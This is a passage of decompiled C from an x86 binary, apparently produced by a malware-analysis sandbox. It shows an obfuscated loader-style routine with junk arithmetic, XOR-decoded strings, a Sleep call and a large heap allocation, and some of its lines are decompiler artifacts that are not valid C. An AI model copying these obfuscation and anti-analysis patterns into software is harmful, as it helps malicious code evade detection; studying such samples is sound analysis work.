					if(( *(_t2796 - 0x30) != 0) > ( *(_t2796 - 0x30) != 0x1d)) {
						_t1766 = 0;
						__eflags =  *0x1000c94;
						if( *0x1000c94 != 0) {
							 *(_t2796 - 0x70) = 0x69f4a17b;
						}
					} else {
						_t1766 = 0;
					}
					 *((char*)(_t2796 - 0xf0)) = 0x56;
					 *((char*)(_t2796 - 0xef)) = 0x7e;
					 *((char*)(_t2796 - 0xee)) = 0x76;
					 *((char*)(_t2796 - 0xed)) = 0x74;
					 *((char*)(_t2796 - 0xec)) = 0x69;
					 *((char*)(_t2796 - 0xeb)) = 0x62;
					 *((char*)(_t2796 - 0xea)) = 0x3b;
					 *((char*)(_t2796 - 0xe9)) = 0x7d;
					 *((char*)(_t2796 - 0xe8)) = 0x7a;
					 *((char*)(_t2796 - 0xe7)) = 0x6e;
					 *((char*)(_t2796 - 0xe6)) = 0x77;
					 *((char*)(_t2796 - 0xe5)) = 0x6f;
					_t2751 = 0;
					__eflags = 0;
					do {
						 *(_t2796 - 0x30) = E00EC1000() & 0x000000ff;
						__eflags =  *(_t2796 - 0x30);
						if( *(_t2796 - 0x30) == 0) {
							_t1182 =  *0x1000cdc;
							__eflags = _t1182 - 0x8362;
							if(_t1182 >= 0x8362) {
								__eflags =  *0x1000c9c - _t1766;
								__eflags = (0 |  *0x1000c9c == _t1766) - _t1182;
								if(__eflags == 0) {
									asm("sbb ecx, ecx");
									 *(_t2796 - 6) =  *(_t2796 - 8) & 0 | __eflags == 0x00000000;
									_t2355 =  *0x1000d08 * 0x4cbe9a17;
									__eflags = _t2355;
									 *0x1000cd2 =  *(_t2796 - 0x38) - 0x14;
									 *0x1000c84 = _t2355;
									 *(_t2796 - 0x2c) =  *0x1000ca0;
								}
							}
						} else {
							_t2356 = "d:\\th\\ds\\ext\\a"; // 0x745c3a64
							_t1284 = "h\\ds\\ext\\a"; // 0x73645c68
							_t1940 = "\\ext\\a"; // 0x7478655c
							 *(_t2796 - 0x174) = _t2356;
							_t2357 =  *0xfff31c; // 0x615c
							 *(_t2796 - 0x170) = _t1284;
							_t1285 =  *0xfff31e; // 0x0
							 *(_t2796 - 0x16c) = _t1940;
							 *((short*)(_t2796 - 0x168)) = _t2357;
							 *((char*)(_t2796 - 0x166)) = _t1285;
							 *(_t2796 - 0x165) = _t1766;
						}
						_t948 = _t2751 - 0xf0; // 0x56
						 *(_t2796 + _t2751 * 2 - 0x190) = ( *(_t2796 + _t948) ^ 0x0000001b) & 0x000000ff;
						_t2751 = _t2751 + 1;
						__eflags = _t2751 - 0xc;
					} while (_t2751 < 0xc);
					_t1183 =  *0x1000c88; // 0xa666078f
					__eflags = _t1183 -  *0x1000ca8; // 0x7b8b5249
					if(__eflags == 0) {
						_t1928 =  *0x1000c8c; // 0xfff500a5
						__eflags = _t1928 -  *0x1000cac; // 0x106b42
						if(__eflags == 0) {
							_t2411 =  *0x1000cf4; // 0x2b91c
							_t1267 =  *0x1000cf0; // 0xd43579fe
							_t1268 = E00ECEE50(_t1267, _t2411, 2, _t1766);
							_t1929 = M01000CB0; // 0x0
							asm("sbb edx, esi");
							 *0x1000cf0 = _t1268 - _t1929;
							 *0x1000cf4 = _t2411;
							 *(_t2796 - 0x80) =  *(_t2796 - 0xb) & 0x000000ff ^  *(_t2796 - 0x80) & 0x0000ffff;
							 *(_t2796 - 0x28) =  *(_t2796 - 0x28) -  *0x1000d10 -  *(_t2796 - 0x28);
							_t1276 =  *0x1000c9c +  *0x1000c9c;
							__eflags = _t1276;
							 *(_t2796 - 8) =  *(_t2796 - 0x6c) - 0x80;
							 *(_t2796 - 6) = _t1276;
						}
					}
					_t1184 =  *0x1000cc0; // 0xffff970a
					_t2359 =  *0x1000ca8; // 0x7b8b5249
					 *((short*)(_t2796 - 0x178)) =  *(_t2796 - 0x134) *  *(_t2796 - 0x130) ^ 0x0000b7f8;
					 *(_t2796 - 0x6c) = 0x5b39;
					 *(_t2796 - 0x24) = _t1184 * 0x1e80;
					 *(_t2796 - 0x6c) =  *0x1215420;
					 *(_t2796 - 0x8c) = _t2359 + 0x7606;
					_t2361 =  *(_t2796 - 2);
					 *0x1000c94 =  *(_t2796 - 9) - 0x74bb;
					_t2752 =  *(_t2796 - 0x44);
					asm("cdq");
					 *((char*)(_t2796 - 0xe4)) = 0x80;
					 *((char*)(_t2796 - 0xe3)) = 0x88;
					 *((char*)(_t2796 - 0xe2)) = 0x80;
					 *((char*)(_t2796 - 0xe1)) = 0x82;
					 *((char*)(_t2796 - 0xe0)) = 0x9f;
					 *((char*)(_t2796 - 0xdf)) = 0x94;
					__eflags = _t2361 -  *(_t2796 - 0x48);
					if(_t2361 !=  *(_t2796 - 0x48)) {
						L359:
						_t1188 = 1;
					} else {
						__eflags = _t2361 - _t2752;
						if(_t2361 == _t2752) {
							_t1188 = 0;
							__eflags = 0;
						} else {
							goto L359;
						}
					}
					_t2753 =  *0x1000cb8; // 0x4
					__eflags =  *(_t2796 - 2) - 0x64;
					_t2363 = 0 |  *(_t2796 - 2) != 0x00000064;
					__eflags = _t1188 - _t2363;
					if(_t1188 == _t2363) {
						_t1263 =  *0x1000c88; // 0xa666078f
						_t2363 =  *0x1000c8c; // 0xfff500a5
						 *0x1000cd8 = E00FFD310(_t1263, 7, _t2363);
						_t1265 =  *0x1000c90; // 0xffff571c
						asm("cdq");
						_t1927 = _t2753 - _t1265;
						__eflags = _t1927;
						_t1266 =  *0x1000cbc; // 0x0
						asm("sbb eax, edx");
						 *(_t2796 - 0x40) = _t1927;
						 *(_t2796 - 0x3c) = _t1266;
					}
					M01000CB0 = _t2753 * 0xfd8bdd23;
					_t2717 = 0;
					__eflags = 0;
					do {
						_t1190 = E00EC1700();
						asm("cdq");
						 *0x1000cc8 = _t1190;
						__eflags = _t1190 | _t2363;
						 *0x1000ccc = _t2363;
						if((_t1190 | _t2363) != 0) {
							__eflags =  *(_t2796 - 0x68) |  *(_t2796 - 0x64);
							if(( *(_t2796 - 0x68) |  *(_t2796 - 0x64)) != 0) {
								_t1194 = 0;
								__eflags = 0;
							} else {
								_t1194 = 1;
							}
							_t2366 = ( *(_t2796 - 5) & 0x000000ff) *  *(_t2796 - 0x28) * _t1194;
							__eflags = _t2366;
							 *(_t2796 - 0x58) = _t2366;
							 *(_t2796 - 0x54) = _t1766;
						} else {
							__eflags =  *(_t2796 - 0x40) |  *(_t2796 - 0x3c);
							if(( *(_t2796 - 0x40) |  *(_t2796 - 0x3c)) != 0) {
								_t1254 = 0;
								__eflags = 0;
							} else {
								_t1254 = 1;
							}
							_t2406 = (_t1254 << 4) - _t1254;
							__eflags = _t2406;
							if(_t2406 != 0) {
								L376:
								_t1255 = 1;
							} else {
								__eflags =  *(_t2796 - 0x18);
								if( *(_t2796 - 0x18) != 0) {
									goto L376;
								} else {
									_t2409 =  *0x1000ca0; // 0x5247
									asm("adc eax, [0x1000ce4]");
									_t2758 = M01000CB0; // 0x0
									_t2759 = _t2758 + _t2409;
									_t1924 =  !( *(_t2796 - 0x58) +  *0x1000ce0);
									__eflags = 0 -  !( *(_t2796 - 0x54));
									if(__eflags < 0) {
										goto L376;
									} else {
										if(__eflags > 0) {
											L375:
											_t1255 = 0;
										} else {
											__eflags = _t2759 - _t1924;
											if(_t2759 <= _t1924) {
												goto L376;
											} else {
												goto L375;
											}
										}
									}
								}
							}
							__eflags =  !_t1255;
							if( !_t1255 != 0) {
								 *(_t2796 - 0x1c) = ( *(_t2796 - 0x1c) & 0x0000ffff) - ( *(_t2796 - 0x1c) & 0x0000ffff) +  *(_t2796 - 0x4c);
								 *0x1000c9b =  *0x1215420;
							}
						}
						_t2363 =  *(_t2796 + _t2717 - 0xe4) ^ 0x000000cd;
						 *(_t2796 + _t2717 * 2 - 0x148) = _t2363 & 0x000000ff;
						_t2717 = _t2717 + 1;
						__eflags = _t2717 - 6;
					} while (_t2717 < 6);
					 *0x1000cd0 =  *0x1000cd0 + 1;
					 *(_t2796 - 0x4c) = 2;
					 *(_t2796 - 0x24) =  *0x1000c9a - 0x57;
					 *0x1000ca0 =  *0x1000ca0 &  *(_t2796 - 0x88) + 0x7d5b2049;
					_t1197 =  *(_t2796 - 0x4c) - _t1766;
					__eflags = _t1197;
					if(_t1197 == 0) {
						 *(_t2796 - 0x38) =  *(_t2796 - 0xf) - 0x399b134;
						 *(_t2796 - 0x34) = _t1766;
						 *0x1000d00 =  *0x1000c88;
						 *0x1000d04 =  *0x1000c8c;
						_t2373 =  *(_t2796 - 0x68) +  *(_t2796 - 0x40);
						asm("adc eax, esi");
						_t1201 = E00ECEE50(E00ECEE50(_t2373,  *(_t2796 - 0x64),  *0x1000d18,  *0x1000d1c), _t2373, 2, _t1766);
						__eflags = _t1201 | _t2373;
						if((_t1201 | _t2373) != 0) {
							_t1203 = 0;
							__eflags = 0;
						} else {
							_t1203 = 1;
						}
						 *(_t2796 - 6) =  *0x1000ce0 |  *0x1000ce4;
						 *0x1000cf8 =  !( *(_t2796 - 0x28) +  *0x1000cb4 + ((0 |  *(_t2796 - 6) == 0x00000000) +  *0x1000c9e & 0x0000ffff)) * _t1203;
						if(( *0x1000ce0 |  *0x1000ce4) != 0) {
							_t1206 = 0;
							__eflags = 0;
						} else {
							_t1206 = 1;
						}
						asm("sbb edx, edx");
						_t2384 =  ~(( *(_t2796 - 0xc) & 0x000000ff) + _t1206) + 1;
						_t1208 =  *0x1000cd0 * 0xda;
						__eflags = _t1208;
						M01000CB0 = _t2384;
						asm("cdq");
						 *(_t2796 - 0x58) = _t1208;
						 *(_t2796 - 0x54) = _t2384;
					} else {
						_t1247 = _t1197 - 1;
						__eflags = _t1247;
						if(_t1247 == 0) {
							 *0x1000c9b =  *0x1000d00;
						} else {
							__eflags = _t1247 == 1;
							if(_t1247 == 1) {
								 *0x1000ca0 = 0x737;
								 *(_t2796 - 0xe) =  !(( *(_t2796 - 0x5c) & 0x0000ffff) * ( *0x1000c9e + 1) + ( *(_t2796 - 0x2c) & 0x0000ffff));
							}
						}
					}
					_t2386 = 0x7bff - ( *(_t2796 - 0x138) ^ 0x0000030e |  *(_t2796 - 0xb8) * 0x000000a9);
					 *(_t2796 - 0x13c) = _t2386;
					_t1213 = E00EC1190();
					asm("cdq");
					 *0x1000d04 = _t2386;
					 *0x1000d00 = _t1213 & 0x000000ff;
					__eflags =  *(_t2796 - 9);
					if( *(_t2796 - 9) != 0) {
						L400:
						_t2388 =  *(_t2796 - 0x80);
						asm("cdq");
						__eflags = (_t2388 & 0x0000ffff) -  *0x1000c88;
						if((_t2388 & 0x0000ffff) !=  *0x1000c88) {
							L403:
							__eflags =  *(_t2796 - 0x80);
							if( *(_t2796 - 0x80) == 0) {
								asm("sbb eax, eax");
								__eflags =  ~( *(_t2796 - 0x4c)) + 1 -  *(_t2796 - 0x90);
								_t1051 =  ~( *(_t2796 - 0x4c)) + 1 ==  *(_t2796 - 0x90);
								__eflags = _t1051;
								if(_t1051 == 0) {
									__eflags =  *0x1000ca4 -  *(_t2796 - 0x24);
									if( *0x1000ca4 >=  *(_t2796 - 0x24)) {
										asm("cdq");
										asm("sbb esi, edx");
										__eflags =  *(_t2796 - 0xa0) -  *0x1000c9c |  *(_t2796 - 0x9c);
										if(( *(_t2796 - 0xa0) -  *0x1000c9c |  *(_t2796 - 0x9c)) != 0) {
											 *0x1000ca4 = (( *(_t2796 - 0xe) & 0x000000ff) -  *0x1000cdc) * (( *(_t2796 - 0xf) & 0x000000ff) +  !( *0x1000cdc) - ( *(_t2796 - 0xc) & 0xff)) * (( *(_t2796 - 9) & 0x000000ff) +  *0x1000c90);
											asm("cdq");
											 *(_t2796 - 0x58) =  *(_t2796 - 0x58) + ( *0x1000c98 & 0x0000ffff);
											asm("adc [ebp-0x54], edx");
											_t1908 =  *(_t2796 - 0xe) & 0x000000ff ^ 0x000000fe;
											__eflags = _t1908;
											 *(_t2796 - 8) = _t1908;
										}
									}
								} else {
									 *0x1000c9a =  !( *0x1000c83);
									 *0x1000c9b =  *(_t2796 - 0x7c) + 0x30;
								}
							}
						} else {
							__eflags = _t2388 -  *0x1000c8c;
							if(_t2388 !=  *0x1000c8c) {
								goto L403;
							} else {
								 *(_t2796 - 1) =  *0x1000cd0;
								 *(_t2796 - 0x5c) = ( *(_t2796 - 8) & 0x000000ff) + ( *(_t2796 - 8) & 0x000000ff) * 4 << 4;
								 *(_t2796 - 5) =  *(_t2796 - 0x4c) & 0x000000ea;
							}
						}
					} else {
						__eflags =  !( *(_t2796 - 0x6c));
						if( !( *(_t2796 - 0x6c)) != 0) {
							goto L400;
						} else {
							( *(_t2796 - 8) & 0xff) - ( !( *(_t2796 - 0xb) & 0x000000ff) |  *(_t2796 - 3) & 0xff) =  !(( *(_t2796 - 8) & 0xff) - ( !( *(_t2796 - 0xb) & 0x000000ff) |  *(_t2796 - 3) & 0xff) < 0);
							if( !(( *(_t2796 - 8) & 0xff) - ( !( *(_t2796 - 0xb) & 0x000000ff) |  *(_t2796 - 3) & 0xff) < 0) != 0) {
								_t1915 =  *0x1000c9e; // 0x0
								 *(_t2796 - 0xd) = _t1915 - 0x5b;
							}
						}
					}
					_t2389 = _t2796 - 0x148;
					_t1216 = _t2796 - 0x190;
					goto L410;
				} else {
					_t2418 =  *0x1000cdc; // 0x84521e70
					 *0x1000cb4 = _t2418 + 0xca6a8024;
					_t2421 = _t1176 * 0x7c >> 0x20;
					 *0x1000c9f = _t1176 * 0x7c;
					asm("cdq");
					asm("adc edx, edi");
					 *(_t2796 - 0x38) = E00ECEE50(( *(_t2796 - 8) & 0x000000ff) +  *(_t2796 - 0x38), _t2421,  *(_t2796 - 0x38),  *(_t2796 - 0x34));
					 *(_t2796 - 0x34) = _t2421;
					_t1951 =  *0x1000ce8; // 0x4
					 *(_t2796 - 0x48) =  *(_t2796 - 0x40) ^ 0xe39f933a;
					 *(_t2796 - 0x44) =  *(_t2796 - 0x3c) ^ 0x0001ddff;
					 *(_t2796 - 0xa) = _t1951 >> 7;
					 *(_t2796 - 0x20) =  *0x1215420;
					 *0x1000d10 = 0x1a;
					 *0x1000d14 = _t1765;
					 *(_t2796 - 4) = (( *(_t2796 - 4) & 0x000000ff) - ( *(_t2796 - 0x18) & 0x0000ffff)) * ( *(_t2796 - 4) & 0x000000ff);
					 *0x1000cd4 =  *0x1000cd4 +  *(_t2796 - 0x2c) * 0xff8d;
					 *(_t2796 - 0x28) =  *(_t2796 - 0x28) *  *0x1000cb4;
					 *(_t2796 - 0x68) =  *0x1215420;
					 *(_t2796 - 0x64) = _t1765;
					_t2428 =  *0x1000d10; // 0x0
					 *(_t2796 - 0xb8) =  *(_t2796 - 0x20) + 0x2ce;
					GetProcAddress(_t2428, "GetLastError");
					 *(_t2796 - 0xb4) =  *(_t2796 - 0x20) + 0x11e;
					asm("cdq");
					 *(_t2796 - 0x48) =  *0x1000c9e;
					 *(_t2796 - 0x44) = _t2428;
					 *(_t2796 - 9) = ( *(_t2796 - 9) & 0x000000ff) + ( *(_t2796 - 2) & 0x000000ff);
					 *0x1000c9f = 0xc8;
					 *(_t2796 - 3) =  *0x1215420 & 0x000000ff;
					 *(_t2796 - 0xac) =  *(_t2796 - 0x20) + 0x30d;
					if( *(_t2796 - 0xac) *  *(_t2796 - 0xb4) == 0xfffffff8) {
						L411:
						__eflags = 0;
						return 0;
					} else {
						_t2875 =  *0x1000c9c - _t1765; // 0xd4
						if(_t2875 != 0) {
							 *0x1000c83 = 3;
							_t1591 =  *0x1000c83 & 0x000000ff;
							 *(_t2796 - 0x88) =  *(_t2796 - 0x6c);
							if(_t1591 <= 3) {
								switch( *((intOrPtr*)(_t1591 * 4 +  &M00EC78AC))) {
									case 0:
										 *0x1000d18 = _t1765;
										 *0x1000d1c = _t1765;
										 *(_t2796 - 0x6c) = ( *(_t2796 - 0xb) & 0x000000ff ^  *(_t2796 - 0x58)) + ( *0x1000c9b & 0x000000ff) -  *(_t2796 - 0x30);
										 *(_t2796 - 0xd) = ( *(_t2796 - 3) & 0x000000ff) + 0xd0;
										goto L149;
									case 1:
										__ecx =  *(__ebp - 0x60) & 0x0000ffff;
										__edx =  *0x1000c9c; // 0x250000d4
										__ecx = ( *(__ebp - 0x60) & 0x0000ffff) - __edx;
										 *(__ebp - 0x60) = __cx;
										goto L149;
									case 2:
										 *0x1000d10 = 0xbe;
										 *0x1000d14 = __ebx;
										goto L149;
									case 3:
										__eax =  *0x112f775;
										asm("cdq");
										 *0x1000cc8 =  *0x112f775;
										__eax =  *(__ebp - 7) & 0x000000ff;
										__ecx =  *0x1000d08; // 0xd72e
										 *0x1000ccc = __edx;
										_t502 = __ecx - 0x632d50be; // -1663913950
										__edx = ( *(__ebp - 7) & 0x000000ff) + _t502;
										 *(__ebp - 7) = __dl;
										__eax =  *(__ebp - 3) & 0x000000ff;
										__ecx =  *0x1000c9a;
										__edx =  *(__ebp - 3) & 0x000000ff;
										__eax = ( *(__ebp - 3) & 0x000000ff) *  *0x1000c9a;
										__edx =  *(__ebp - 3) & 0x000000ff | ( *(__ebp - 3) & 0x000000ff) *  *0x1000c9a;
										 *(__ebp - 3) = __dl;
										__eax =  *(__ebp - 0xa0);
										__ecx =  *(__ebp - 0x9c);
										__eax =  *(__ebp - 0xa0) - 0x13;
										__eflags = __eax;
										 *0x1000cdc = __eax;
										goto L149;
								}
							}
						}
						L149:
						Sleep(0xfa); // executed
						_t1310 = RtlAllocateHeap(_t2750, 8, 0x12e3a0); // executed
						_t2432 =  *(_t2796 - 7);
						 *0x10bbe8c = _t1310;
						if(_t2432 >  *0x1000cdc) {
							__eflags =  *(_t2796 - 0x60);
							if(__eflags != 0) {
								asm("cdq");
								asm("adc edx, esi");
								asm("adc edx, esi");
								_t1581 =  *(_t2796 - 0x60) +  *(_t2796 - 0x88) +  *(_t2796 - 0x68) | _t2432;
								__eflags = _t1581;
								if(_t1581 != 0) {
									_t2143 = 0;
									__eflags = 0;
								} else {
									_t2143 = _t1581 + 1;
								}
								__eflags =  *0x1000cd0; // 0x0
								asm("cdq");
								asm("cdq");
								asm("sbb edi, edx");
								asm("adc esi, edi");
								_t2145 = _t2143 + (0 | __eflags == 0x00000000) - 0x38 -  !( *0x1000cec & 0x0000ffff) -  *(_t2796 - 0x48);
								asm("sbb esi, eax");
								__eflags = M01000CB0;
								 *0x1000cc0 =  !_t2145;
								 *0x1000cc4 =  !0x00000000;
								if(M01000CB0 != 0) {
									_t1588 = 0;
									__eflags = 0;
									 *(_t2796 - 0xbc) = 0;
								} else {
									_t1588 = 1;
									 *(_t2796 - 0xbc) = 0;
								}
								_t2606 =  *0x1000c84; // 0x52f68420
								_t2147 =  *0x1000cb4; // 0x51
								 *0x1000c9e = _t2147 - (_t1588 |  *0x1000d10);
								 *0x1000d08 = ( *(_t2796 - 0x18) ^ 0x00000082) * ( !(_t2606 *  *0x1000d00) & 0x0000ffff);
								_t1765 = 0;
								__eflags = 0;
							}
						} else {
							 *0x1000ca0 =  *(_t2796 - 0x1c) + 0x30;
						}
						_t1961 =  *(_t2796 - 0xc4);
						if( *(_t2796 - 0xc4) * 0xfffc7d5b == ( *(_t2796 - 0xa8) |  *(_t2796 - 0xc4) | 0x0000023d)) {
							goto L411;
						} else {
							_t2879 =  *(_t2796 - 0x68) |  *(_t2796 - 0x64);
							if(( *(_t2796 - 0x68) |  *(_t2796 - 0x64)) != 0) {
							}
							_t1318 = E00EC8E37(_t1961, _t2879, 0x64, 0x2d); // executed
							 *(_t2796 - 0x78) = _t1318;
							 *(_t2796 - 0x74) = _t1765;
							_t1319 =  *(_t2796 - 0x78);
							if( *(_t2796 - 0x74) > _t1765 || _t1319 > _t1765) {
								_t1962 = 1;
							} else {
								_t1962 = 0;
								__eflags = 0;
							}
							_t1320 =  *(_t2796 - 0x78);
							if( *(_t2796 - 0x74) > _t1765 || _t1320 > 0x56) {
								_t1321 = 1;
							} else {
								_t1321 = 0;
								__eflags = 0;
							}
							if(_t1962 != _t1321) {
								__eflags =  *(_t2796 - 0x28);
								if( *(_t2796 - 0x28) == 0) {
									L178:
									__eflags =  *0x1000cd2;
									if(__eflags == 0) {
										__eflags =  *(_t2796 - 0x24);
										if(__eflags == 0) {
											_t2128 =  *0x1000d10; // 0x0
											_t1569 =  *0x1000cf8; // 0xffff
											 *(_t2796 - 0x4c) = _t2128 + 0x5f35bf84;
											_t2130 =  *0x1000cc8; // 0x1
											 *0x1000cd0 =  *0x1000cd0 + _t2130 * 0x75df;
											 *0x1000c9c =  *0x1000c9e * 0x307c;
											_t2596 = (_t1569 << 4) + _t1569;
											__eflags = _t2596;
											 *0x1000ca8 = 0xe0dd;
											 *0x1000cac = _t1765;
											 *0x1000cf8 = _t2596;
										}
									} else {
										 *(_t2796 - 3) =  *(_t2796 - 3) |  *(_t2796 - 3) +  *0x1000ce0;
										 *0x1000ca4 =  ~( *(_t2796 - 5) & 0xff);
										_t2134 =  *0x1000cd4; // 0x0
										 *0x1000c9b = ( *(_t2796 - 9) & 0x000000ff) - 0x27;
										 *(_t2796 - 3) = ( *(_t2796 - 3) & 0x000000ff) - _t2134;
										 *0x1000c9e =  *0x1215420 & 0x000000ff;
									}
								} else {
									__eflags =  *(_t2796 - 7);
									if(__eflags == 0) {
										goto L178;
									} else {
										_t2600 =  *0x1000c90; // 0xffff571c
										 *0x1000c94 = _t2600;
									}
								}
							} else {
								_t2885 =  *0x1000d20 -  *0x1000c9a; // 0x530e
								if(_t2885 == 0) {
									__eflags =  *(_t2796 - 4) -  *(_t2796 - 0x24);
									if(__eflags != 0) {
										_t2138 =  *0x1000d00; // 0xfffff835
										_t2602 =  *0x1000d04; // 0xffffffff
										asm("adc edx, ebx");
										M01000CB0 = 0x396ae7eb;
										 *(_t2796 - 0xc) = 0x3e;
										 *0x1000cc8 = _t2138 + 0x1afd0521;
										 *0x1000ccc = _t2602;
									}
								} else {
									 *0x1000ca4 = ( *0x1000c9b & 0x000000ff) - 0x313bc7a3;
									 *(_t2796 - 4) =  *0x1215420;
								}
							}
							if( *0x10bbe8c == _t1765) {
								 *(_t2796 - 0xc) = E00EC1370(__eflags);
								__eflags =  *(_t2796 - 0xc);
								if( *(_t2796 - 0xc) > 0) {
									 *0x1000cf8 = 0x8d03;
								}
								_t2436 =  *0x1215420;
								 *(_t2796 - 0x20) = _t2436;
								__eflags =  *0x1000c9b;
								 *(_t2796 - 0xb4) =  *(_t2796 - 0x20) + 0x276;
								if( *0x1000c9b != 0) {
									L208:
									__eflags =  *(_t2796 - 0xc) -  *(_t2796 - 5);
									if( *(_t2796 - 0xc) <=  *(_t2796 - 5)) {
										_t1964 = 0;
										__eflags = 0;
									} else {
										_t1964 = 1;
									}
									asm("cdq");
									asm("adc edx, [0x1000d14]");
									__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t1964;
									if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t1964) {
										L214:
										_t1331 = 0;
										__eflags = 0;
									} else {
										__eflags = _t2436;
										if(_t2436 != 0) {
											goto L214;
										} else {
											_t1331 = 1;
										}
									}
									__eflags =  *0x1000cf8 - _t1765;
									 *(_t2796 - 0xa8) = _t1765;
									_t1966 = 0 |  *0x1000cf8 == _t1765;
									__eflags = _t1966 -  *(_t2796 - 0x28);
									asm("sbb ecx, ecx");
									( *(_t2796 - 3) & 0x000000ff) - _t1966 + 1 = _t1331 - ( *(_t2796 - 3) & 0x000000ff) - _t1966 + 1 < 0;
									_t1765 =  *(_t2796 - 0xa8);
									if(_t1331 != ( *(_t2796 - 3) & 0x000000ff) - _t1966 + 1 < 0) {
										__eflags =  *(_t2796 - 0x8c);
										_t2442 =  *(_t2796 - 0x8c) - (0 |  *(_t2796 - 0x8c) == 0x00000000);
										__eflags = _t2442;
										if(_t2442 != 0) {
											 *0x1000ca0 =  *0x1215420;
											asm("cdq");
											 *0x1000cbc = _t2442;
											_t2442 =  *0x1000ce8;
											_t2107 = ( *(_t2796 - 0xe) & 0x000000ff) * _t2442;
											__eflags = _t2107;
											 *0x1000cb8 =  *0x1000c9a - 0x20f4;
											 *(_t2796 - 0xe) = _t2107;
										}
									} else {
										 *(_t2796 - 0x18) =  *0x1000ca4 - ( *(_t2796 - 0xb) & 0xff);
										asm("cdq");
										 *0x1000cf0 =  *0x1000cf0 - ( *(_t2796 - 9) & 0x000000ff);
										asm("sbb [0x1000cf4], edx");
										_t2442 =  *(_t2796 - 0x64);
										 *0x1000c94 =  *(_t2796 - 0x68) + 0xbfc4;
										 *(_t2796 - 0x6c) = ( *(_t2796 - 0xa) & 0xff) * 0x9564;
									}
								} else {
									__eflags = ( *0x1000c83 & 0x000000ff) -  *(_t2796 - 0x90);
									if(( *0x1000c83 & 0x000000ff) >  *(_t2796 - 0x90)) {
										goto L208;
									} else {
										 *(_t2796 - 0x28) =  *0x1000cd2 + 0xd71b;
										 *(_t2796 - 0x24) =  *(_t2796 - 0x24) - 1;
										 *(_t2796 - 0xb) = ( *(_t2796 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t2796 - 0xb) & 0xff);
										_t2442 = ( *(_t2796 - 5) & 0x000000ff) + ( *(_t2796 - 5) & 0x000000ff &  *0x1000cd8);
										 *(_t2796 - 5) = _t2442;
									}
								}
								 *(_t2796 - 0xac) =  *(_t2796 - 0x20) + 0x2e4;
								_t1336 =  *(_t2796 - 1);
								asm("cdq");
								__eflags = _t1336 -  *0x1000d10; // 0x0
								if(__eflags != 0) {
									L221:
									_t1337 = 1;
								} else {
									__eflags = _t2442 -  *0x1000d14; // 0x0
									if(__eflags == 0) {
										_t1337 = 0;
										__eflags = 0;
									} else {
										goto L221;
									}
								}
								_t2443 =  *(_t2796 - 1);
								_t2443 - 0x30 = _t1337 - (_t2443 != 0x30);
								if(_t1337 > (_t2443 != 0x30)) {
									asm("cdq");
									asm("sbb esi, edx");
									asm("cdq");
									__eflags =  *0x1000d10 - ( *(_t2796 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t2443;
									if(( *0x1000d10 - ( *(_t2796 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t2443) != 0) {
										 *(_t2796 - 0x1c) =  *(_t2796 - 0x38) *  *(_t2796 - 0x1c);
										 *(_t2796 - 0x28) = 0x3090bb2d;
										_t2572 =  *(_t2796 - 1) + 0x23;
										__eflags = _t2572;
										 *0x1000c9a = _t2572;
										 *(_t2796 - 0x40) = E00ECEE50( *(_t2796 - 0x38),  *(_t2796 - 0x34), 0x7d, _t1765);
										 *(_t2796 - 0x3c) = _t2572;
									}
								} else {
									 *0x1000c9f = TlsGetValue( *(_t2796 - 0x60));
								}
								 *(_t2796 - 0xb8) =  *(_t2796 - 0x20) + 0x2bc;
								 *(_t2796 - 0x20) =  *0x1215420;
								 *0x1000cd0 = 0xfffff41d;
								 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
								_t1342 =  *0x1000cb8; // 0x4
								 *0x1000c94 =  *(_t2796 - 0x38) * 0xdcf2d26f;
								 *(_t2796 - 0x90) = _t1342 & 0x00000006;
								 *(_t2796 - 0x14) =  *(_t2796 - 0x20) + 0x3b1;
								__eflags =  *(_t2796 - 0x7c);
								if( *(_t2796 - 0x7c) == 0) {
									__eflags =  *0x1000ca8 |  *0x1000cac;
									if(( *0x1000ca8 |  *0x1000cac) != 0) {
										__eflags =  !( *0x1000d10) |  !( *0x1000d14);
										if(( !( *0x1000d10) |  !( *0x1000d14)) != 0) {
											 *0x1000ca4 =  *0x1000ca4 - 1;
											asm("adc ecx, [0x1000cbc]");
											 *(_t2796 - 0x38) =  *(_t2796 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
											asm("adc ecx, 0xfff005d1");
											asm("adc eax, 0xfff765fd");
											 *0x1000ce4 =  *0x1000d04;
											 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
											asm("cdq");
											 *(_t2796 - 0x38) =  *(_t2796 - 0x38) -  *(_t2796 - 1) + 0x10;
											asm("sbb [ebp-0x34], edx");
											_t2091 = ( *(_t2796 - 0xa0) +  *(_t2796 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
											__eflags = _t2091;
											 *0x1000c83 = _t2091;
										}
									} else {
										 *0x1000ca4 = ( *(_t2796 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
										 *(_t2796 - 0x30) =  *(_t2796 - 0x30) -  *(_t2796 - 0x40);
										 *(_t2796 - 0x24) =  *0x1000c84 + 0x6491;
									}
								} else {
									__eflags =  *(_t2796 - 0x6c);
									if( *(_t2796 - 0x6c) != 0) {
										_t1516 =  *0x1000ce0; // 0x0
										_t2094 =  *0x1000ce4; // 0x0
										__eflags = _t1516 ^  *0x1000d18 | _t2094 ^  *0x1000d1c;
										if(__eflags == 0) {
											 *0x1000c84 = 0x78;
											 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
											 *0x1000ccc = _t1765;
											 *(_t2796 - 3) =  *0x1215420;
											 *(_t2796 - 0x70) =  *0x1000cb4 << 4;
										} else {
											 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
											_t2103 =  *0x1000c9c; // -44
											 *0x1000c8c = _t1765;
											 *(_t2796 - 4) =  *(_t2796 - 0xd) & 0xffffff00 | __eflags == 0x00000000;
											 *(_t2796 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
											 *0x113d808 = _t2103;
										}
									}
								}
								 *(_t2796 - 0xa4) =  *(_t2796 - 0x20) + 0x241;
								 *(_t2796 - 0xc4) =  *(_t2796 - 0x20) + 0x273;
								 *(_t2796 - 0x20) =  *0x1215420;
								 *(_t2796 - 6) = E00EC1000();
